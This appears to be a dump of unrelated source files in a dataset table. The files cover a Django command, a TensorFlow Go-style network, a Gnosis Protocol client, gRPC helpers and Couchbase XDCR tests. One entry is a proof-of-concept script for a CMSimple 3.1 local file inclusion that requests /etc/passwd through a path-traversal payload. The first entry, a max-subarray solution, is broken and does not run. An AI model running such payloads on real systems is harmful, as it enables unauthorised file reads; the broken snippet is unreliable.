id
stringlengths 3
8
| content
stringlengths 100
981k
|
|---|---|
1708060
|
class Solution:
def maxSubArray(self, nums: List[int]) -> int:
dp[0] = nums[0]
for i in range(1, len(nums)):
dp[i] = max(nums[i], dp[i-1] + nums[i])
res = -1
for i in range(len(dp))
res = max(res, dp[i])
return res
|
1708065
|
from datetime import datetime
from django.core.management import BaseCommand
from django.db import connection
from club.settings import POST_HOTNESS_PERIOD
from posts.models.post import Post
class Command(BaseCommand):
help = "Updates hotness rank"
def handle(self, *args, **options):
Post.objects.exclude(hotness=0).update(hotness=0)
with connection.cursor() as cursor:
cursor.execute("""
update posts
set hotness = coalesce(
(
select round(sum(
pow(
(%s - abs(extract(epoch from age(c.created_at, now())))) / 3600,
1.3
)
))
from (
select distinct on (author_id) created_at
from comments
where comments.post_id = posts.id
and is_deleted = false
and created_at > %s
order by author_id
) as c
)
, 0.0)
where is_visible = true
and last_activity_at > %s
""", [
POST_HOTNESS_PERIOD.total_seconds(),
datetime.utcnow() - POST_HOTNESS_PERIOD,
datetime.utcnow() - POST_HOTNESS_PERIOD,
])
|
1708070
|
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''CMSimple 3.1 - Local File Inclusion''',
"description": '''Directory traversal vulnerability in cmsimple/cms.php in CMSimple 3.1, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.''',
"severity": "high",
"references": [
"https://www.exploit-db.com/exploits/5700"
],
"classification": {
"cvss-metrics": "",
"cvss-score": "",
"cve-id": "",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2008", "lfi"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/index.php?sl=../../../../../../../etc/passwd%00"""
method = "GET"
data = """"""
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if (resp0.status_code == 200) and (re.search(r"""root:.*:0:0:""",resp0.text)):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
|
1708090
|
def precise(lexer, precise_token, parent_token):
# Due to a pygments bug*, custom tokens will look bad
# on outside styles. Until it is fixed on upstream, we'll
# convey whether the client is using pie style or not
# through precise option and return more precise tokens
# depending on it's value.
#
# [0]: https://github.com/pygments/pygments/issues/1986
if precise_token is None or not lexer.options.get("precise"):
return parent_token
else:
return precise_token
|
1708121
|
from app import create_app, db
from app.models import User
application = create_app()
@application.shell_context_processor
def make_shell_context():
return {"db": db, "User": User}
if __name__ == "__main__":
application.run(port=5003, debug=True)
|
1708123
|
import mobula
import mobula.layers as L
import numpy as np
def go_eltwise(op):
a = np.array([1,0,6]).astype(np.float)
b = np.array([4,5,3]).astype(np.float)
print ("a: ", a)
print ("b: ", b)
data1 = L.Data(a)
data2 = L.Data(b)
coeffs = np.array([-1.0,1.2])
l = L.Eltwise([data1,data2], op = op, coeffs = coeffs)
l.reshape()
l.forward()
print ("Y: ", l.Y)
dY = np.array([7, 8, 9]).astype(np.float)
l.dY = dY
print ("dY: ", l.dY)
l.backward()
print ("dX: ", l.dX[0], l.dX[1])
c0, c1 = coeffs
if op == L.Eltwise.SUM:
Y = c0 * a + c1 * b
dX0 = c0 * dY
dX1 = c1 * dY
elif op == L.Eltwise.PROD:
Y = a * b * c0 * c1
dX0 = b * dY * c0 * c1
dX1 = a * dY * c0 * c1
elif op == L.Eltwise.MAX:
Y = np.max([c0*a,c1*b], 0)
i = np.argmax([c0*a,c1*b], 0)
dX0 = np.zeros(a.shape)
dX1 = np.zeros(b.shape)
dX0[i == 0] = dY[i == 0] * c0
dX1[i == 1] = dY[i == 1] * c1
print ("Y", l.Y, Y)
assert np.allclose(l.Y, Y)
assert np.allclose(l.dX[0], dX0)
assert np.allclose(l.dX[1], dX1)
def test_eltwise():
print ("TEST SUM")
go_eltwise(L.Eltwise.SUM)
print ("TEST PROD")
go_eltwise(L.Eltwise.PROD)
print ("TEST MAX")
go_eltwise(L.Eltwise.MAX)
|
1708125
|
from typing import List, Optional, Union, cast
import requests
from eip712_structs import make_domain
from eth_account import Account
from eth_account.messages import encode_defunct
from eth_typing import AnyAddress, ChecksumAddress, HexStr
from hexbytes import HexBytes
from web3 import Web3
from gnosis.eth import EthereumNetwork, EthereumNetworkNotSupported
from .order import Order, OrderKind
try:
from typing import TypedDict # pylint: disable=no-name-in-module
except ImportError:
from typing_extensions import TypedDict
try:
from functools import cache
except ImportError:
from functools import lru_cache
cache = lru_cache(maxsize=None)
class TradeResponse(TypedDict):
blockNumber: int
logIndex: int
orderUid: HexStr
buyAmount: str # Stringified int
sellAmount: str # Stringified int
sellAmountBeforeFees: str # Stringified int
owner: AnyAddress # Not checksummed
buyToken: AnyAddress
sellToken: AnyAddress
txHash: HexStr
class AmountResponse(TypedDict):
amount: str
token: AnyAddress
class ErrorResponse(TypedDict):
error_type: str
description: str
class GnosisProtocolAPI:
"""
Client for GnosisProtocol API. More info: https://docs.cowswap.exchange/
"""
settlement_contract_addresses = {
EthereumNetwork.MAINNET: "0x9008D19f58AAbD9eD0D60971565AA8510560ab41",
EthereumNetwork.RINKEBY: "0x9008D19f58AAbD9eD0D60971565AA8510560ab41",
EthereumNetwork.XDAI: "0x9008D19f58AAbD9eD0D60971565AA8510560ab41",
}
api_base_urls = {
EthereumNetwork.MAINNET: "https://protocol-mainnet.gnosis.io/api/v1/",
EthereumNetwork.RINKEBY: "https://protocol-rinkeby.gnosis.io/api/v1/",
EthereumNetwork.XDAI: "https://protocol-xdai.gnosis.io/api/v1/",
}
def __init__(self, ethereum_network: EthereumNetwork):
self.network = ethereum_network
if self.network not in self.api_base_urls:
raise EthereumNetworkNotSupported(
f"{self.network.name} network not supported by Gnosis Protocol"
)
self.domain_separator = self.build_domain_separator(self.network)
self.base_url = self.api_base_urls[self.network]
@classmethod
def build_domain_separator(cls, ethereum_network: EthereumNetwork):
return make_domain(
name="Gnosis Protocol",
version="v2",
chainId=str(ethereum_network.value),
verifyingContract=cls.settlement_contract_addresses[ethereum_network],
)
def get_fee(self, order: Order) -> int:
if order["kind"] == "sell":
amount = order["sellAmount"]
else:
amount = order["buyAmount"]
url = (
self.base_url
+ f'fee/?sellToken={order["sellToken"]}&buyToken={order["buyToken"]}'
f'&amount={amount}&kind={order["kind"]}'
)
result = requests.get(url).json()
if "amount" in result:
return int(result["amount"])
else:
return 0
def place_order(
self, order: Order, private_key: HexStr
) -> Union[HexStr, ErrorResponse]:
"""
Place order. If `feeAmount=0` in Order it will be calculated calling `get_fee(order)`
:return: UUID for the order as an hex hash
"""
assert (
order["buyAmount"] and order["sellAmount"]
), "Order buyAmount and sellAmount cannot be empty"
url = self.base_url + "orders/"
order["feeAmount"] = order["feeAmount"] or self.get_fee(order)
signable_bytes = order.signable_bytes(domain=self.domain_separator)
signable_hash = Web3.keccak(signable_bytes)
message = encode_defunct(primitive=signable_hash)
signed_message = Account.from_key(private_key).sign_message(message)
data_json = {
"sellToken": order["sellToken"].lower(),
"buyToken": order["buyToken"].lower(),
"sellAmount": str(order["sellAmount"]),
"buyAmount": str(order["buyAmount"]),
"validTo": order["validTo"],
"appData": HexBytes(order["appData"]).hex()
if isinstance(order["appData"], bytes)
else order["appData"],
"feeAmount": str(order["feeAmount"]),
"kind": order["kind"],
"partiallyFillable": order["partiallyFillable"],
"signature": signed_message.signature.hex(),
"signingScheme": "ethsign",
"from": Account.from_key(private_key).address,
}
r = requests.post(url, json=data_json)
if r.ok:
return HexStr(r.json())
else:
return ErrorResponse(r.json())
def get_trades(
self, order_ui: Optional[HexStr] = None, owner: Optional[ChecksumAddress] = None
) -> List[TradeResponse]:
assert bool(order_ui) ^ bool(
owner
), "order_ui or owner must be provided, but not both"
url = self.base_url + "trades/?"
if order_ui:
url += f"orderUid={order_ui}"
elif owner:
url += f"owner={owner}"
response = requests.get(url)
if response.ok:
return cast(List[TradeResponse], response.json())
else:
return []
def get_estimated_amount(
self,
base_token: ChecksumAddress,
quote_token: ChecksumAddress,
kind: OrderKind,
amount: int,
) -> Union[AmountResponse, ErrorResponse]:
"""
The estimated amount in quote token for either buying or selling amount of baseToken.
"""
url = self.base_url + f"markets/{base_token}-{quote_token}/{kind.name}/{amount}"
response = requests.get(url)
if response.ok:
return AmountResponse(response.json())
else:
return ErrorResponse(response.json())
|
1708138
|
import abc
import numpy as np
import six
import os
import tensorflow as tf
@six.add_metaclass(abc.ABCMeta)
class NeuralNetwork(object):
"""Abstract base class for Neural Network used in
policy-value net.
Details can be found in https://www.nature.com/articles/nature24270
'Mastering the game of Go without human knowledge'
"""
@abc.abstractmethod
def policyValueFunc(self, board):
pass
@abc.abstractmethod
def trainStep(self, state_batch, mcts_probs_batch, winner_batch, lr):
pass
@abc.abstractmethod
def save(self, path):
pass
@abc.abstractmethod
def restore(self, path):
pass
@abc.abstractproperty
def width(self):
pass
@abc.abstractproperty
def height(self):
pass
class SimpleCNN(NeuralNetwork):
def __init__(self, height, width, model_file=None, norm_weight=1e-4):
self.board_width = width
self.board_height = height
# Define the neural network
with tf.variable_scope("SimpleCNN"):
# input placeholders
# input states placeholder, 4 channels are:
# board_state[0]: current board state with only current player's stone
# board_state[1]: current board state with only opponent's stones
# board_state[2]: only one stone, indicate the last move(opponent made this move).
# board_state[3]: indicate the player to play, 0 for white, 1 for black
self.raw_input_states = tf.placeholder(
tf.float32, shape=[None, 4, height, width])
# label contains the result of game
self.value_labels = tf.placeholder(tf.float32, shape=[None, 1])
# label contains the probability vector from MCTS for each step of game
self.mcts_probs_labels = tf.placeholder(
tf.float32, shape=[None, height*width])
self.learning_rate = tf.placeholder(tf.float32)
self.is_training = tf.placeholder(tf.bool)
# tensorflow like input with format [N,H,W,C]
self.input_states = tf.transpose(self.raw_input_states, [0, 2, 3, 1])
# Shared Layers
with tf.variable_scope("shared_layers"):
self.conv1 = tf.layers.conv2d(inputs=self.input_states,
filters=32, kernel_size=3,
padding="same", activation=tf.nn.relu,
name="conv1")
self.batchnorm1 = tf.layers.batch_normalization(self.conv1, training=self.is_training)
self.conv2 = tf.layers.conv2d(inputs=self.batchnorm1, filters=64,
kernel_size=3, padding="same",
activation=tf.nn.relu, name="conv2")
self.batchnorm2 = tf.layers.batch_normalization(self.conv2, training=self.is_training)
self.conv3 = tf.layers.conv2d(inputs=self.conv2, filters=128,
kernel_size=3, padding="same",
activation=tf.nn.relu, name="conv3")
self.batchnorm3 = tf.layers.batch_normalization(self.conv3, training=self.is_training)
# Action net layers
with tf.variable_scope("action_layers"):
self.action_conv = tf.layers.conv2d(inputs=self.batchnorm3, filters=8,
kernel_size=1, padding="same",
activation=tf.nn.relu, name="action_conv")
self.action_conv_flat = tf.reshape(
self.action_conv, [-1, 8 * height * width])
self.action_out = tf.layers.dense(inputs=self.action_conv_flat,
units=height*width,
activation=tf.nn.softmax,
name="action_out")
self.action_out_log = tf.log(self.action_out)
# Value net layers
with tf.variable_scope("value_layers"):
self.value_conv = tf.layers.conv2d(inputs=self.batchnorm3, filters=2,
kernel_size=1, padding="same",
activation=tf.nn.relu, name="value_conv")
self.value_conv_flat = tf.reshape(
self.value_conv, [-1, 2 * height * width]
)
self.value_fc = tf.layers.dense(inputs=self.value_conv_flat, units=64,
activation=tf.nn.relu, name="value_fc")
self.value_out = tf.layers.dense(inputs=self.value_fc, units=1,
activation=tf.nn.tanh, name="value_out")
# losses
self.value_loss = tf.losses.mean_squared_error(
self.value_labels, self.value_out)
self.policy_loss = tf.negative(tf.reduce_mean(tf.reduce_sum(tf.multiply(
self.mcts_probs_labels, self.action_out_log), 1)))
trainable_vars = tf.trainable_variables()
self.l2_norm_weight = norm_weight
l2_norm = norm_weight * tf.add_n(
[tf.nn.l2_loss(v) for v in trainable_vars if ('bias' not in v.name.lower() and
'moving' not in v.name.lower())])
self.loss = self.value_loss + self.policy_loss + l2_norm
self.entropy = tf.negative(tf.reduce_mean(
tf.reduce_sum(self.action_out * tf.log(self.action_out), -1)
))
# train op part
self.optimizer = tf.train.AdamOptimizer(
learning_rate=self.learning_rate)
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
self.train_op = self.optimizer.minimize(self.loss)
self.global_step = tf.get_variable("global_step", initializer=0, trainable=False)
self.step_add_op = self.global_step + 1
# session
self.session = tf.Session()
self.session.run(tf.global_variables_initializer())
# Saver
self.saver = tf.train.Saver()
if model_file is not None:
self.restore(model_file)
def restore(self, model_path):
dir_path = os.path.dirname(model_path)
self.saver.restore(self.session, tf.train.latest_checkpoint(dir_path))
def save(self, model_path):
global_step = self.getGlobalStep()
dir_path = os.path.dirname(model_path)
if not tf.gfile.Exists(dir_path):
tf.gfile.MakeDirs(dir_path)
self.saver.save(self.session, model_path, global_step=global_step)
def getPolicyValue(self, state_batch):
act_prob, value = self.session.run(
[self.action_out, self.value_out],
feed_dict={self.raw_input_states: state_batch, self.is_training: False}
)
return act_prob, value
def policyValueFunc(self, board):
"""The Policy-value function.
This function takes a board state and return evaluation value
and next_action probability vector.
"""
valid_positions = board.availables
current_state = np.ascontiguousarray(board.currentState().reshape(
-1, 4, self.board_height, self.board_width))
policy_vec, value = self.getPolicyValue(current_state)
# 0 because getPolicyValue takes batch of data
policy_vec = zip(valid_positions, policy_vec[0][valid_positions])
return policy_vec, value
def trainStep(self, state_batch, mcts_probs_batch, winner_batch, lr):
"""Perform single training step.
Args:
state_batch: A numpy array of board state used as the training data.
mcts_probs_batch: A numpy array of action probability vectors
used as training label.
winner_batch: A numpy array of game result used as training label.
lr: learning rate.
"""
winner_batch = np.reshape(winner_batch, (-1, 1))
loss, _, _, entropy = self.session.run(
[self.loss, self.train_op, self.step_add_op, self.entropy],
feed_dict={self.raw_input_states: state_batch,
self.mcts_probs_labels: mcts_probs_batch,
self.value_labels: winner_batch,
self.learning_rate: lr,
self.is_training: True})
return loss, entropy
def getGlobalStep(self):
global_step = self.session.run(self.global_step)
return global_step
@property
def width(self):
return self.board_width
@property
def height(self):
return self.board_height
|
1708142
|
import socket
import json
def main():
serversocket = socket.socket()
host = "localhost"
port = 23456
serversocket.bind((host, port))
serversocket.listen(1)
while True:
s, addr = serversocket.accept()
msg = s.recv(1024).decode("utf-8")#[1:]
print(msg)
msgJson = json.loads(msg)
response = processResponse(msgJson["request"])
sendJson = {"id": msgJson["id"], "response": response}
response = json.dumps(sendJson)
print(response)
sendResponse(response)
s.close()
def sendResponse(msg):
s = socket.socket()
host = "localhost"
port = 12345
s.connect((host, port))
s.send(msg.encode('utf-8'))
s.close()
def processResponse(requestString):
return requestString
if __name__ == '__main__':
main()
|
1708158
|
import unittest
import os
import fv3gfs.wrapper
from util import get_default_config, main
test_dir = os.path.dirname(os.path.abspath(__file__))
rundir = os.path.join(test_dir, "rundir")
class TracerMetadataTests(unittest.TestCase):
def test_tracer_index_is_one_based(self):
data = fv3gfs.wrapper.get_tracer_metadata()
indexes = []
for entry in data.values():
self.assertIn("i_tracer", entry)
indexes.append(entry["i_tracer"])
indexes = sorted(indexes)
self.assertEqual(indexes[0], 1)
self.assertEqual(indexes[-1], len(indexes))
self.assertEqual(
len(indexes), len(set(indexes))
) # test there are no duplicates
def test_tracer_metadata_has_all_keys(self):
data = fv3gfs.wrapper.get_tracer_metadata()
for name, metadata in data.items():
with self.subTest(msg=name):
self.assertIn("units", metadata)
self.assertIn("i_tracer", metadata)
self.assertIn("fortran_name", metadata)
self.assertIn("restart_name", metadata)
self.assertIn("is_water", metadata)
self.assertIn("dims", metadata)
self.assertIsInstance(metadata["units"], str)
self.assertIsInstance(metadata["i_tracer"], int)
self.assertIsInstance(metadata["fortran_name"], str)
self.assertIsInstance(metadata["is_water"], bool)
self.assertIsInstance(metadata["restart_name"], str)
self.assertIsInstance(metadata["dims"], list)
def test_all_tracers_present(self):
tracer_names = [
"specific_humidity",
"cloud_water_mixing_ratio",
"rain_mixing_ratio",
"cloud_ice_mixing_ratio",
"snow_mixing_ratio",
"graupel_mixing_ratio",
"ozone_mixing_ratio",
"cloud_amount",
]
data = fv3gfs.wrapper.get_tracer_metadata()
self.assertEqual(set(data.keys()), set(tracer_names))
def test_ozone_not_water(self):
data = fv3gfs.wrapper.get_tracer_metadata()
self.assertFalse(data["ozone_mixing_ratio"]["is_water"])
def test_specific_humidity_is_water(self):
data = fv3gfs.wrapper.get_tracer_metadata()
self.assertTrue(data["specific_humidity"]["is_water"])
def test_all_tracers_in_restart_names(self):
tracer_names = [
"specific_humidity",
"cloud_water_mixing_ratio",
"rain_mixing_ratio",
"cloud_ice_mixing_ratio",
"snow_mixing_ratio",
"graupel_mixing_ratio",
"ozone_mixing_ratio",
"cloud_amount",
]
restart_names = fv3gfs.wrapper.get_restart_names()
missing_names = set(tracer_names).difference(restart_names)
self.assertEqual(len(missing_names), 0)
if __name__ == "__main__":
config = get_default_config()
config[
"initial_conditions"
] = "gs://vcm-fv3config/data/initial_conditions/c12_restart_initial_conditions/v1.0"
config["namelist"]["fv_core_nml"]["external_ic"] = False
config["namelist"]["fv_core_nml"]["nggps_ic"] = False
config["namelist"]["fv_core_nml"]["make_nh"] = False
config["namelist"]["fv_core_nml"]["mountain"] = True
config["namelist"]["fv_core_nml"]["warm_start"] = True
config["namelist"]["fv_core_nml"]["na_init"] = 0
main(test_dir, config)
|
1708226
|
from dataclasses import asdict
from functools import wraps
import json
from protobuf_to_dict import protobuf_to_dict
from dacite import from_dict
from schemes.graph import GraphNode, GraphRelation
from configs.config import logger
def raise_customized_error(capture, target):
def _raise_customized_error(func):
@wraps(func)
def wapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except capture:
raise target
return wapper
return _raise_customized_error
def raise_grpc_error(capture, grpc_status_code):
def _raise_grpc_error(func):
@wraps(func)
def wrapper(self, request, context):
try:
return func(self, request, context)
except capture as e:
context.set_code(grpc_status_code)
if hasattr(e, "desc"):
context.set_details(e.desc)
else:
context.set_details("Maybe RPC Error.")
return wrapper
return _raise_grpc_error
def deco_log_error(logger):
def _deco_log_error(func):
@wraps(func)
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as e:
if logger:
logger.exception(e)
raise e
# return {"errors": {"code": e.code, "desc": e.desc}}
return wrapper
return _deco_log_error
def convert_node_to_graphnode(node):
label = str(node.labels)[1:]
dct = dict(node)
name = dct.pop("name")
gn = GraphNode(label, name, dct)
return gn
def convert_relation_to_graph_relation(relation):
start = convert_node_to_graphnode(relation.start_node)
end = convert_node_to_graphnode(relation.end_node)
kind = list(relation.types())[0]
props = dict(relation)
gr = GraphRelation(start, end, kind, props)
return gr
def convert_query_to_scheme():
def _convert_query_to_scheme(func):
@wraps(func)
def wrapper(self, qin, **kwargs):
query = func(self, qin, **kwargs)
result = []
for gobj in query:
if gobj.relationships:
obj = convert_relation_to_graph_relation(gobj)
else:
obj = convert_node_to_graphnode(gobj)
result.append(obj)
return result
return wrapper
return _convert_query_to_scheme
def convert_request_to(target):
"""
convert different kinds of request to needed input.
there are 4 needed inputs:
- GraphNode
- GraphRelation
- RawString
- ExtractorInput
"""
def _convert_request_to(func):
@wraps(func)
def wrapper(self, request, context):
dctreq = protobuf_to_dict(request)
if "props" in dctreq:
req_props = dctreq["props"]
dctreq["props"] = json.loads(req_props)
if "start" in dctreq:
start_props = dctreq["start"]["props"]
dctreq["start"]["props"] = json.loads(start_props)
if "end" in dctreq:
end_props = dctreq["end"]["props"]
dctreq["end"]["props"] = json.loads(end_props)
request = from_dict(target, dctreq)
result = func(self, request, context)
return result
return wrapper
return _convert_request_to
def convert_graphobj_to_dict(graphobj):
"""
A graphobj is a GraphNode or GraphRelation
"""
dct = asdict(graphobj)
if "props" in dct:
dct["props"] = json.dumps(dct["props"])
if "start" in dct:
start_props = dct["start"]["props"]
dct["start"]["props"] = json.dumps(start_props)
if "end" in dct:
end_props = dct["end"]["props"]
dct["end"]["props"] = json.dumps(end_props)
return dct
|
1708249
|
import copy
from membase.helper.cluster_helper import ClusterOperationHelper
from couchbase_helper.documentgenerator import BlobGenerator
from .xdcrnewbasetests import XDCRNewBaseTest
from .xdcrnewbasetests import NodeHelper
from .xdcrnewbasetests import Utility, BUCKET_NAME, OPS
from remote.remote_util import RemoteMachineShellConnection
from lib.memcached.helper.data_helper import MemcachedClientHelper
from membase.api.rest_client import RestConnection
# Assumption that at least 2 nodes on every cluster
class bidirectional(XDCRNewBaseTest):
def setUp(self):
super(bidirectional, self).setUp()
self.src_cluster = self.get_cb_cluster_by_name('C1')
self.src_master = self.src_cluster.get_master_node()
self.dest_cluster = self.get_cb_cluster_by_name('C2')
self.dest_master = self.dest_cluster.get_master_node()
def tearDown(self):
super(bidirectional, self).tearDown()
def __perform_ops_joint_sets(self):
# Merging the keys as keys are actually replicated.
temp_expires = self._expires
self._expires = 0 # Assigning it to 0, so that merge_buckets don't wait for expiration here.
self.merge_all_buckets()
tasks = []
kv_gen_src = self.src_cluster.get_kv_gen()[OPS.CREATE]
gen_update = BlobGenerator(kv_gen_src.name,
kv_gen_src.seed,
kv_gen_src.value_size,
start=0,
end=int(kv_gen_src.end * (float)(self._perc_upd) / 100))
gen_delete = BlobGenerator(kv_gen_src.name,
kv_gen_src.seed,
kv_gen_src.value_size,
start=int((kv_gen_src.end) * (float)(100 - self._perc_del) / 100),
end=kv_gen_src.end)
if "C1" in self._upd_clusters:
tasks += self.src_cluster.async_load_all_buckets_from_generator(gen_update, OPS.UPDATE, self._expires)
if "C2" in self._upd_clusters:
tasks += self.dest_cluster.async_load_all_buckets_from_generator(gen_update, OPS.UPDATE, self._expires)
if "C1" in self._del_clusters:
tasks += self.src_cluster.async_load_all_buckets_from_generator(gen_delete, OPS.DELETE, 0)
if "C2" in self._del_clusters:
tasks += self.dest_cluster.async_load_all_buckets_from_generator(gen_delete, OPS.DELETE, 0)
for task in tasks:
task.result()
self._expires = temp_expires
if (self._wait_for_expiration and self._expires) and ("C1" in self._upd_clusters or "C2" in self._upd_clusters):
self.sleep(self._expires)
self.sleep(self._wait_timeout)
"""Bidirectional replication between two clusters(currently), create-updates-deletes on DISJOINT sets on same bucket."""
def load_with_ops(self):
self.setup_xdcr_and_load()
self.perform_update_delete()
self.verify_results()
"""Bidirectional replication between two clusters(currently), create-updates-deletes on DISJOINT sets on same bucket.
Here running incremental load on both cluster1 and cluster2 as specified by the user/conf file"""
def load_with_async_ops(self):
self.setup_xdcr_and_load()
self.async_perform_update_delete()
self.verify_results()
"""Testing Bidirectional load( Loading at source/destination). Failover node at Source/Destination while
Create/Update/Delete are performed in parallel based on doc-ops specified by the user.
Verifying whether XDCR replication is successful on subsequent destination clusters. """
def load_with_async_ops_and_joint_sets(self):
self.setup_xdcr_and_load()
self.async_perform_update_delete()
self.verify_results()
def load_with_async_ops_with_warmup(self):
self.setup_xdcr_and_load()
warmupnodes = []
if "C1" in self._warmup:
warmupnodes.append(self.src_cluster.warmup_node())
if "C2" in self._warmup:
warmupnodes.append(self.dest_cluster.warmup_node())
self.sleep(self._wait_timeout)
NodeHelper.wait_warmup_completed(warmupnodes)
self.async_perform_update_delete()
self.sleep(self._wait_timeout // 2)
self.verify_results()
def load_with_async_ops_with_warmup_master(self):
self.setup_xdcr_and_load()
warmupnodes = []
if "C1" in self._warmup:
warmupnodes.append(self.src_cluster.warmup_node(master=True))
if "C2" in self._warmup:
warmupnodes.append(self.dest_cluster.warmup_node(master=True))
self.sleep(self._wait_timeout)
NodeHelper.wait_warmup_completed(warmupnodes)
self.async_perform_update_delete()
self.sleep(self._wait_timeout // 2)
self.verify_results()
def load_with_async_ops_and_joint_sets_with_warmup(self):
bucket_type = self._input.param("bucket_type", "membase")
if bucket_type == "ephemeral":
"Test case does not apply for Ephemeral buckets"
return
self.setup_xdcr_and_load()
warmupnodes = []
if "C1" in self._warmup:
warmupnodes.append(self.src_cluster.warmup_node())
if "C2" in self._warmup:
warmupnodes.append(self.dest_cluster.warmup_node())
self.sleep(self._wait_timeout)
self.async_perform_update_delete()
self.sleep(self._wait_timeout // 2)
NodeHelper.wait_warmup_completed(warmupnodes)
self.verify_results()
def load_with_async_ops_and_joint_sets_with_warmup_master(self):
self.setup_xdcr_and_load()
warmupnodes = []
if "C1" in self._warmup:
warmupnodes.append(self.src_cluster.warmup_node(master=True))
if "C2" in self._warmup:
warmupnodes.append(self.dest_cluster.warmup_node(master=True))
self.sleep(self._wait_timeout)
self.async_perform_update_delete()
self.sleep(self._wait_timeout // 2)
NodeHelper.wait_warmup_completed(warmupnodes)
self.verify_results()
def load_with_failover(self):
self.setup_xdcr_and_load()
if "C1" in self._failover:
self.src_cluster.failover_and_rebalance_nodes()
if "C2" in self._failover:
self.dest_cluster.failover_and_rebalance_nodes()
self.sleep(self._wait_timeout // 6)
self.perform_update_delete()
self.sleep(300)
self.verify_results()
def load_with_failover_then_add_back(self):
self.setup_xdcr_and_load()
if "C1" in self._failover:
self.src_cluster.failover_and_rebalance_nodes(rebalance=False)
self.src_cluster.add_back_node()
if "C2" in self._failover:
self.dest_cluster.failover_and_rebalance_nodes(rebalance=False)
self.dest_cluster.add_back_node()
self.perform_update_delete()
self.verify_results()
def load_with_failover_master(self):
self.setup_xdcr_and_load()
if "C1" in self._failover:
self.src_cluster.failover_and_rebalance_master()
if "C2" in self._failover:
self.dest_cluster.failover_and_rebalance_master()
self.sleep(self._wait_timeout // 6)
self.perform_update_delete()
self.verify_results()
"""Replication with compaction ddocs and view queries on both clusters.
This test begins by loading a given number of items on both clusters.
It creates _num_views as development/production view with default
map view funcs(_is_dev_ddoc = True by default) on both clusters.
Then we disabled compaction for ddoc on src cluster. While we don't reach
expected fragmentation for ddoc on src cluster we update docs and perform
view queries for all views. Then we start compaction when fragmentation
was reached fragmentation_value. When compaction was completed we perform
a full verification: wait for the disk queues to drain
and then verify that there has been no data loss on both clusters."""
def replication_with_ddoc_compaction(self):
bucket_type = self._input.param("bucket_type", "membase")
if bucket_type == "ephemeral":
self.log.info("Test case does not apply to ephemeral")
return
self.setup_xdcr()
self.src_cluster.load_all_buckets(self._num_items)
self.dest_cluster.load_all_buckets(self._num_items)
num_views = self._input.param("num_views", 5)
is_dev_ddoc = self._input.param("is_dev_ddoc", True)
fragmentation_value = self._input.param("fragmentation_value", 80)
for bucket in self.src_cluster.get_buckets():
views = Utility.make_default_views(bucket.name, num_views, is_dev_ddoc)
ddoc_name = "ddoc1"
prefix = ("", "dev_")[is_dev_ddoc]
query = {"full_set": "true", "stale": "false"}
tasks = self.src_cluster.async_create_views(ddoc_name, views, BUCKET_NAME.DEFAULT)
tasks += self.dest_cluster.async_create_views(ddoc_name, views, BUCKET_NAME.DEFAULT)
for task in tasks:
task.result(self._poll_timeout)
self.src_cluster.disable_compaction()
fragmentation_monitor = self.src_cluster.async_monitor_view_fragmentation(prefix + ddoc_name, fragmentation_value, BUCKET_NAME.DEFAULT)
# generate load until fragmentation reached
while fragmentation_monitor.state != "FINISHED":
# update docs to create fragmentation
self.src_cluster.update_delete_data(OPS.UPDATE)
for view in views:
# run queries to create indexes
self.src_cluster.query_view(prefix + ddoc_name, view.name, query)
self.dest_cluster.query_view(prefix + ddoc_name, view.name, query)
fragmentation_monitor.result()
compaction_task = self.src_cluster.async_compact_view(prefix + ddoc_name, 'default')
self.assertTrue(compaction_task.result())
self.verify_results()
def replication_with_view_queries_and_ops(self):
bucket_type = self._input.param("bucket_type", "membase")
if bucket_type == "ephemeral":
self.log.info("Test case does not apply to ephemeral")
return
tasks = []
try:
self.setup_xdcr()
self.src_cluster.load_all_buckets(self._num_items)
self.dest_cluster.load_all_buckets(self._num_items)
num_views = self._input.param("num_views", 5)
is_dev_ddoc = self._input.param("is_dev_ddoc", True)
for bucket in self.src_cluster.get_buckets():
views = Utility.make_default_views(bucket.name, num_views, is_dev_ddoc)
ddoc_name = "ddoc1"
prefix = ("", "dev_")[is_dev_ddoc]
query = {"full_set": "true", "stale": "false", "connection_timeout": 60000}
tasks = self.src_cluster.async_create_views(ddoc_name, views, BUCKET_NAME.DEFAULT)
tasks += self.dest_cluster.async_create_views(ddoc_name, views, BUCKET_NAME.DEFAULT)
for task in tasks:
task.result(self._poll_timeout)
tasks = []
# Setting up doc-ops at source nodes
if "C1" in self._upd_clusters:
tasks.extend(self.src_cluster.async_update_delete(OPS.UPDATE, self._perc_upd, self._expires))
if "C1" in self._del_clusters:
tasks.extend(self.src_cluster.async_update_delete(OPS.DELETE, self._perc_del))
if "C2" in self._upd_clusters:
tasks.extend(self.dest_cluster.async_update_delete(OPS.UPDATE, self._perc_upd, self._expires))
if "C2" in self._del_clusters:
tasks.extend(self.dest_cluster.async_update_delete(OPS.DELETE, self._perc_del))
self.sleep(5)
while True:
for view in views:
self.src_cluster.query_view(prefix + ddoc_name, view.name, query)
self.dest_cluster.query_view(prefix + ddoc_name, view.name, query)
if {task.state for task in tasks} != {"FINISHED"}:
continue
else:
if self._wait_for_expiration:
if "C1" in self._upd_clusters or "C2" in self._upd_clusters:
self.sleep(self._expires)
break
self.merge_all_buckets()
self.src_cluster.verify_items_count()
self.dest_cluster.verify_items_count()
tasks = []
src_buckets = self.src_cluster.get_buckets()
dest_buckets = self.dest_cluster.get_buckets()
for view in views:
